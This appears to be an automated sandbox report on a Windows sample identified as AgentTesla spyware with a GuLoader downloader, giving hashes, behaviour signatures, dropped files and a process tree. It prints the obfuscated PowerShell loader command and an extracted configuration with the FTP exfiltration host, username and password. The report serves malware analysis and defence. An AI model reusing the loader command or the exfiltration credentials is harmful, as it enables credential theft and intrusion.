Overview

overview

10

Static

static

3

SecuriteIn...61.exe

windows7-x64

7

SecuriteIn...61.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-09-2024 10:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe

  • Size

    707KB

  • MD5

    23956e32be182666e0efceecd423376f

  • SHA1

    2e00a592b4c2fa8b99b62eb9d0e886bfcc103dc2

  • SHA256

    a764b13001e6096c2ac36917bef4405ba8d22b6d06a5741f21977bf46c8afca4

  • SHA512

    abe088e593ea900b9ed622b7e1751b2d3f1287b6dc683b99ee76629f4a2c5fecf5a21065ac15e2d6b60ec15bef16f05c2eab31858d0a381f87318cdb3f19bb5b

  • SSDEEP

    12288:jfYRGeCHL7BTAIMMMgNTl+kVpMfynA4fA3Nws9Cn6oUisns52wA3ImBlVknu6RtM:jfYIxMMMgNTcv6nAUuS6fbs2wA/leliz

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://mail.hearing-vision.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    LILKOOLL14!

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3640
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Kuldsejlede=Get-Content 'C:\Users\Admin\AppData\Local\hjemmebagtes\Semitisk\Kompagnon.Boa';$Rheumily=$Kuldsejlede.SubString(52518,3);.$Rheumily($Kuldsejlede)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Program Files (x86)\windows mail\wabmig.exe
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\quipping.ini
    Filesize

    31B

    MD5

    b65d9d0954c63abeaa2f3bbfbdb38083

    SHA1

    cb1463622481c3ac5cb5fe4244e3b793450f634b

    SHA256

    e4789c68b39b47d9b8790d5fabc77bc3e48bb018be4d5bffa3adc6825e2a0f2d

    SHA512

    df1c7f3117c3ee307e2de0c7bbe0e0d9ed451e1f726f24572b5b3f2c44051b98fe3a20c68c9b3ad4f0db146b276a836b2dceadfecfc176ad1f49fc113f1ebd22

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bejca4is.riz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\nso9079.tmp\nsExec.dll
    Filesize

    7KB

    MD5

    11092c1d3fbb449a60695c44f9f3d183

    SHA1

    b89d614755f2e943df4d510d87a7fc1a3bcf5a33

    SHA256

    2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

    SHA512

    c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

    Download Submit

  • C:\Users\Admin\AppData\Local\hjemmebagtes\Semitisk\Kompagnon.Boa
    Filesize

    51KB

    MD5

    92a895c8e85749ca3f49b937b27518a9

    SHA1

    0191a7383722202ace332e5ca1405fe6693dc6b1

    SHA256

    765ea1c471430d2f1d5101d9d9dd6c1f21ba1fb08ecce594135e05a685badcad

    SHA512

    9df7f333a5c1b5c4a3b815605db888f5e01cfc87c4125026e09e387e73125fa1425aa6a0dd92a7bc46b2ecd9cd0da12a2ae079475483300f5b975637b5d034f3

    Download Submit

  • C:\Users\Admin\AppData\Local\hjemmebagtes\Semitisk\varmetppe.Ove
    Filesize

    339KB

    MD5

    e83c55228cd6aa177575f805039e6d2f

    SHA1

    53377279edfe9d8c23dd3f616acc699bd6e90f28

    SHA256

    0f26eda5b73127d926f7f80a70d5425cd0b317c4a92326ba65ffd3b69b171488

    SHA512

    5af11c072286063df1a79de4c16650fb4ec531aac01daa3971dfb357815e1cc58d141528bf8c820944330be722cd69d3044a5c1af9b2ab15d74d8f81b99e7866

    Download Submit

  • memory/1164-172-0x0000000008220000-0x000000000889A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1164-148-0x00000000732BE000-0x00000000732BF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1164-153-0x00000000055D0000-0x0000000005636000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1164-154-0x00000000056B0000-0x0000000005716000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1164-151-0x0000000004FA0000-0x00000000055C8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1164-160-0x0000000005760000-0x0000000005AB4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1164-165-0x0000000005D90000-0x0000000005DAE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1164-166-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1164-169-0x0000000006D70000-0x0000000006D92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1164-168-0x0000000006290000-0x00000000062AA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1164-167-0x00000000062E0000-0x0000000006376000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1164-170-0x00000000075F0000-0x0000000007B94000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1164-150-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-149-0x00000000027D0000-0x0000000002806000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1164-174-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-175-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-176-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-152-0x0000000004EE0000-0x0000000004F02000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1164-178-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-179-0x00000000732BE000-0x00000000732BF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1164-180-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-181-0x00000000088A0000-0x000000000DA77000-memory.dmp

    Filesize

    81.8MB

    Download

  • memory/1164-182-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-183-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1164-185-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3884-186-0x0000000002470000-0x0000000007647000-memory.dmp

    Filesize

    81.8MB

    Download

  • memory/3884-187-0x0000000076F21000-0x0000000077041000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/3884-191-0x0000000001210000-0x0000000002464000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3884-192-0x0000000001210000-0x0000000001252000-memory.dmp

    Filesize

    264KB

    Download

  • memory/3884-193-0x0000000026160000-0x00000000261B0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3884-194-0x0000000026250000-0x00000000262E2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3884-195-0x0000000026140000-0x000000002614A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3884-197-0x0000000076F21000-0x0000000077041000-memory.dmp

    Filesize

    1.1MB

    Download